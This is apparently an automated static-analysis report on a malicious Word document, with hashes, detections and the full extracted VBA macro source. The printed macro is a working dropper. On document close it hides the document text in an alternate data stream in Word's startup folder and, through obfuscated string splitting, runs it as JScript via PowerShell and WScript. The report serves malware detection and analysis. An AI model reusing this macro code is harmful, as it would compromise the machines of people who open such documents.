Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 31506f24f43b4850…

MALICIOUS

Office (OOXML) / .DOCX

109.5 KB Created: 2019-10-03 07:37:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2026-06-12
MD5: c22c4b94793d98838f6a8a9673a907f7 SHA-1: 7c148f43ae49f9def4a23f6cbc4b6fc6ec087ee8 SHA-256: 31506f24f43b485082093bc00082375a2d36a2bc42d673db44e748b2ba9b064a
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The macros utilize `CreateObject` and `CallByName` to execute shell commands and write to the file system, specifically creating a file named 'margee' in the application's startup path. This behavior strongly suggests the document is designed to download and execute a second-stage payload, consistent with a dropper malware.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-7336299-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7336299-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Volotea = "The most thrue get application in test shell and some process a fear or script test it and power with execute ."
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3288 bytes
SHA-256: b9f278f0e62282c75b9119370b3f116391e541e1fe3b7a43fdee54a28c03862b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Mexa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private StatusBar2 As String

'Ok test it

Private Function WarInside()
  Dim Io_res As String, MoonCover As Integer
  Io_res = Application.StartupPath & "\" & "margee" & ":" & Application.Version
  MoonCover = FreeFile
  Open Io_res For Binary Lock Read Write As #MoonCover
  Put #MoonCover, , ActiveDocument.Content.Text
  Close #MoonCover
  StatusBar2 = Io_res
End Function


Sub SetNet()

Dim shp As Shape
Dim dWidth As Double
Dim dHeight As Double
Dim dInc As Double 'Place dots ever dInc inches (assumes 72 DPI)
Dim iIncW As Integer, iIncH As Integer
Dim i As Integer, j As Integer
Dim dDoc As Document
'----INPUT----
dInc = 0.25 'place dots every dInc inches
'-------------
 
Application.ScreenUpdating = False
Set dDoc = ActiveDocument
dWidth = dDoc.PageSetup.PageWidth
dHeight = dDoc.PageSetup.PageHeight
iIncW = 11 ' CInt(dWidth / 72 / dInc)
iIncH = 11 ' CInt(iIncW * dHeight / dWidth)
 
For i = 1 To iIncW
    For j = 1 To iIncH
        Set shp = dDoc.Shapes.AddShape(Type:=msoShapeOval, Left:=dWidth / iIncW * i, Top:=dHeight / iIncH * j, _
                       Width:=2, Height:=2)
         shp.Fill.ForeColor = RGB(215, 215, 215)
         shp.Line.Visible = msoFalse
    Next j
Next i
Set shp = Nothing
Set dDoc = Nothing
Application.ScreenUpdating = True
WarInside
End Sub

'Good

Private Function Pain(stn As Bookmark)
Dim Volotea As String
On Error Resume Next
SetNet
Volotea = "The most thrue get application in test shell and some process a fear or script test it and power with execute ."
CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
Pain = 1
End Function

'Thank you

Private Sub MyMan()
    Dim u As Bookmark
    
    Pain u
End Sub

'Binary

Private Sub Combine_PDFs_Demo()
Dim strPDFs(0 To 2) As String
Dim bSuccess As Boolean
strPDFs(0) = "C:\Users\Ryan\Desktop\Page1.pdf"
strPDFs(1) = "C:\Users\Ryan\Desktop\Page5.pdf"
strPDFs(2) = "C:\Users\Ryan\Desktop\Page10.pdf"
 bSuccess = MergePDFs(strPDFs, "C:\Users\Ryan\Desktop\MyNewPDF.pdf")
If bSuccess = False Then MsgBox "Failed to combine all PDFs", vbCritical, "Failed to Merge PDFs"
End Sub

'Join

Private Sub Document_Close()
MyMan
End Sub



Private Sub Document_Save()
Combine_PDFs_Demo
End Sub
















Attribute VB_Name = "NewMacros"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F26B8EF6-FEA1-4BFE-A2BD-6A30A932AB36}{8D2C4A61-44F8-4DD7-9FE5-BDCB3E95EEE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25088 bytes
SHA-256: 78c0ab64af723ee3ca31b61ed3a593a64d2d146fb6f02512b4af280d7a669ef6
Detection
ClamAV: Doc.Dropper.Agent-7336299-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.